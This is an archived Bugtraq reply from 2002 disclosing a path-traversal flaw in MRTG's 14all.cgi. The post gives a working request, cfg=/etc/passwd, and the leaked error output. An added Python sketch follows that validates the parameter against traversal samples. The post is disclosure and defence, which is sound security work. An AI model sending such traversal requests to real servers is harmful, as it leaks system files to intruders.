Bugtraq mailing list archives
Re: Mrtg Path Disclosure Vulnerability
From: "Jason Hicks" <HicksJ () NATFUEL COM>
Date: Fri, 08 Feb 2002 11:28:22 -0500
Actually, it does not display the webroot directory... it lists the location where 14all.cgi is configured to look for the config files. In your case that may be the webroot, but not in mine.

BUT... Better yet, 14all.cgi allows (accepts) path entries in the web request... (a slight no no)

Example:
http://mrtghost/cgi-bin/14all.cgi?cfg=/etc/passwd

Anyone care to guess what this returns?

}Software error:
}ERROR: CFG Error Unknown Option "root:x:0:0:root:/root" on line 2 or
}above. Check doc/reference.txt for Help
}
}For help, please send mail to the webmaster (x), giving
}this error message and the time and date of the error.

Luckily my /etc/shadow is not readable! :)

Nothing like giving away the first line of _any_ readable file on your system....

Jason Hicks
Network Architect
National Fuel - Buffalo, NY
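An added example, not part of the original post and not 14all.cgi's own code: one way to confine a cfg request parameter like the one above to plain file names inside a single config directory, sketched in Python. The directory layout, the .cfg suffix rule and all function names are assumptions.

```python
import os
import re
import tempfile

# Assumption: config files live in one directory and have simple names
# ending in .cfg; the real 14all.cgi layout may differ.
CFG_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]*\.cfg")

class CfgRejected(Exception):
    """Raised for any cfg value that is not a plain file name in cfg_dir."""

def resolve_cfg(cfg_param, cfg_dir):
    """Map the request's cfg= value to a file inside cfg_dir, or raise."""
    # 1. Bare file name only: no '/', no '\', no leading dot, fixed suffix.
    if not CFG_NAME.fullmatch(cfg_param):
        raise CfgRejected("invalid cfg name")
    base = os.path.realpath(cfg_dir)
    # 2. Resolve symlinks, then confirm the result is still under cfg_dir.
    target = os.path.realpath(os.path.join(base, cfg_param))
    if os.path.commonpath([base, target]) != base:
        raise CfgRejected("cfg resolves outside config directory")
    if not os.path.isfile(target):
        raise CfgRejected("no such cfg")
    return target

def check(cfg_param, cfg_dir):
    """Return 'ok' or 'rejected'; the caller shows a fixed error page,
    never a parser message that quotes file content."""
    try:
        resolve_cfg(cfg_param, cfg_dir)
        return "ok"
    except CfgRejected:
        return "rejected"

def demo():
    """Constructed sample: one real config plus a symlink pointing outside."""
    with tempfile.TemporaryDirectory() as root:
        cfg_dir = os.path.join(root, "mrtg")
        os.mkdir(cfg_dir)
        open(os.path.join(cfg_dir, "router.cfg"), "w").close()
        outside = os.path.join(root, "secret")
        open(outside, "w").close()
        os.symlink(outside, os.path.join(cfg_dir, "link.cfg"))
        samples = ["router.cfg", "/etc/passwd", "../secret", "link.cfg", "missing.cfg"]
        return {s: check(s, cfg_dir) for s in samples}

if __name__ == "__main__":
    print(demo())
```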